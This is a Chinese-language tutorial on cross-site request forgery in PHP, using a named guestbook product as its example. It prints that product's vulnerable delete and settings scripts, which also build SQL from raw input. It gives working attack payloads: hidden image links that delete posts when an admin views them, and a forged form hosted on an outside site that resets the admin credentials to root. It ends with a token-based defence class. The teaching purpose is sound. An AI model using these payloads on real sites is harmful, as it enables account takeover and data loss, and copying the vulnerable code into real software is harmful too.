偽造跨站請求介紹
偽造跨站請求比較難以防範,而且危害巨大,攻擊者可以通過這種方式惡作劇,發spam資訊,刪除資料等等。這種攻擊常見的表現形式有:
偽造連結,引誘使用者點擊,或是讓使用者在不知情的情況下訪問
偽造表單,引誘使用者提交。表單可以是隱藏的,用圖片或連結的形式偽裝。
比較常見而且也很廉價的防範手段是在所有可能涉及使用者寫操作的表單中加入一個隨機且變換頻繁的字串,然後在處理表單的時候對這個字串進行檢查。這個隨機字串如果和目前使用者身份相關聯的話,那麼攻擊者偽造請求會比較麻煩。
如果攻擊者以隱藏的方式發送給目標使用者連結
<img src="/buy.php?item=watch&num=1000"/>,那麼如果目標使用者不小心訪問以後,購買的數量就成了1000個
執行個體
隨緣網路PHP留言板V1.0
| 代碼如下 | 複製代碼 |
| 任意刪除留言 //delbook.php 此頁面用於刪除留言 <?php include_once("dlyz.php"); //dlyz.php使用者驗證許可權,當許可權是admin的時候方可刪除留言 include_once("../conn.php"); $del=$_GET["del"]; $id=$_GET["id"]; if ($del=="data") { $ID_Dele= implode(",",$_POST['adid']); $sql="delete from book where id in (".$ID_Dele.")"; mysql_query($sql); } else { $sql="delete from book where id=".$id; //傳遞要刪除的留言ID mysql_query($sql); } mysql_close($conn); echo "<script language='javascript'>"; echo "alert('刪除成功!');"; echo " location='book.php';"; echo "</script>"; ?> |
|
當我們具有admin許可權,提交http://localhost/manage/delbook.php?id=2 時,就會刪除id為2的留言
利用方法:
我們使用普通使用者留言(原始碼方式),內容為
| 代碼如下 | 複製代碼 |
<img src="delbook.php?id=2" /> <img src="delbook.php?id=3" /> <img src="delbook.php?id=4" /> <img src="delbook.php?id=5" /> |
|
插入4張圖片連結分別刪除4個id留言,然後我們返回首頁瀏覽看,沒有什麼變化。。圖片顯示不了
現在我們再用管理員帳號登陸後,來重新整理首頁,會發現留言就剩一條,其他在圖片連結中指定的ID號的留言,全部都被刪除。
攻擊者在留言中插入隱藏的圖片連結,此連結具有刪除留言的作用,而攻擊者自己訪問這些圖片連結的時候,是不具有許可權的,所以看不到任何效果,但是當管理員登陸後,查看此留言,就會執行隱藏的連結,而他的許可權又是足夠大的,從而這些留言就被刪除了
修改管理員密碼
| 代碼如下 | 複製代碼 |
| //pass.php if($_GET["act"]) { $username=$_POST["username"]; $sh=$_POST["sh"]; $gg=$_POST["gg"]; $title=$_POST["title"]; $copyright=$_POST["copyright"]."<br/>設計製作:<a href=http://www.115cn.cn>廈門隨緣網路科技</a>"; $password=md5($_POST["password"]); if(empty($_POST["password"])) { $sql="update gly set username='".$username."',sh=".$sh.",gg='".$gg."',title='".$title."',copyright='".$copyright."' where id=1"; } else { $sql="update gly set username='".$username."',password='".$password."',sh=".$sh.",gg='".$gg."',title='".$title."',copyright='".$copyright."' where id=1"; } mysql_query($sql); mysql_close($conn); echo "<script language='javascript'>"; echo "alert('修改成功!');"; echo " location='pass.php';"; echo "</script>"; } 這個檔案用於修改管理密碼和網站設定的一些資訊,我們可以直接構造如下表單: <body> <form action="http://localhost/manage/pass.php?act=xg" method="post" name="form1" id="form1"> <input type="radio" value="1" name="sh"> <input type="radio" name="sh" checked value="0"> <input type="text" name="username" value="root"> <input type="password" name="password" value="root"> <input type="text" name="title" value="隨緣網路PHP留言板V1.0(帶審核功能)" > <textarea name="gg" rows="6" cols="80" >歡迎您安裝使用隨緣網路PHP留言板V1.0(帶審核功能)!</textarea> <textarea name="copyright" rows="6" cols="80" >隨緣網路PHP留言本V1.0 著作權:廈門隨緣網路科技 2005-2009<br/>承接網站建設及系統定製 提供優惠主機網域名稱</textarea> </form> </body> |
|
存為attack.html,放到自己網站上http://www.111cn.net此頁面訪問後會自動向目標程式的pass.php提交參數,使用者名稱修改為root,密碼修改為root,然後我們去留言板發一條留言,隱藏這個連結,管理訪問以後,他的使用者名稱和密碼全部修改成了root
防止偽造跨站請求
yahoo對付偽造跨站請求的辦法是在表單裡加入一個叫.crumb的隨機串;而facebook也有類似的解決辦法,它的表單裡常常會有post_form_id和fb_dtsg。
隨機串代碼實現
咱們按照這個思路,山寨一個crumb的實現,代碼如下:
| 代碼如下 | 複製代碼 |
| <?php class Crumb { CONST SALT = "your-secret-salt"; static $ttl = 7200; static public function challenge($data) { return hash_hmac('md5', $data, self::SALT); } static public function issueCrumb($uid, $action = -1) { $i = ceil(time() / self::$ttl); return substr(self::challenge($i . $action . $uid), -12, 10); } static public function verifyCrumb($uid, $crumb, $action = -1) { $i = ceil(time() / self::$ttl); if(substr(self::challenge($i . $action . $uid), -12, 10) == $crumb || substr(self::challenge(($i - 1) . $action . $uid), -12, 10) == $crumb) return true; return false; } } |
|
代碼中的$uid表示使用者唯一標識,而$ttl表示這個隨機串的有效時間。
應用樣本
構造表單
在表單中插入一個隱藏的隨機串crumb
| 代碼如下 | 複製代碼 |
|
|
處理表單 demo.php
對crumb進行檢查
| 代碼如下 | 複製代碼 |
<?php |
|
Start building with 50+ products and up to 12 months usage for Elastic Compute Service
1 on 1 presale consultation
24/7 Technical Support 6 Free Tickets per Quarter Faster Response
Alibaba Cloud offers highly flexible support services tailored to meet your exact needs.
A comprehensive suite of global cloud computing services to power your business
Payment Methods We Support
